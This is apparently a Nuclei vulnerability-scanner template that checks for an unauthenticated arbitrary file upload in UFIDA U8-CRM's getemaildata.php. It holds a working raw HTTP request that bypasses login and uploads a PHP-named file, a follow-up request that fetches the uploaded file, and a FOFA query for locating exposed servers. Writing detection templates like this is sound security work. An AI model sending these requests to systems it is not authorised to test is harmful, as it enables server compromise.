nuclei-templates/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml

60 lines
2.1 KiB
YAML

id: yonyou-u8-crm-fileupload
info:
name: UFIDA U8-CRM getemaildata - Arbitary File Upload
author: SleepingBag945,pussycat0x
severity: critical
description: |
There is an arbitrary file upload vulnerability in the getemaildata.php file of UFIDA U8 CRM customer relationship management system. An attacker can obtain server permissions through the vulnerability and attack the server.
metadata:
verified: true
max-request: 2
fofa-query: body="用友U8CRM"
tags: yonyou,file-upload,u8-crm,intrusive
http:
- raw:
- |
POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host: {{Hostname}}
Content-Length: 300
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=ibru7pqnplhi720caq0ev8uvt0
------WebKitFormBoundaryAVuAKsvesmnWtgEP
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream
{{randstr}}
------WebKitFormBoundaryAVuAKsvesmnWtgEP
Content-Disposition: form-data; name="upload"
upload
------WebKitFormBoundaryAVuAKsvesmnWtgEP--
- |
GET /tmpfile/{{path}}.tmp.mht HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code_1==200 && status_code_2==200"
- "contains(body_2, '{{randstr}}')"
condition: and
extractors:
- type: regex
part: body_1
internal: true
name: path
group: 1
regex:
- '([a-zA-Z0-9]+)\.tmp\.mht'
# digest: 4b0a00483046022100e656811347cdd4dda04256a5cda88439ae6fd34b6d69e0c3b063978435ae9a6b02210092c415a317f35ec9f01af48589cb0b2acad5549bc2ab18a1b3399d9fc0a8d0b2:922c64590222798bb761d5b6d8e72950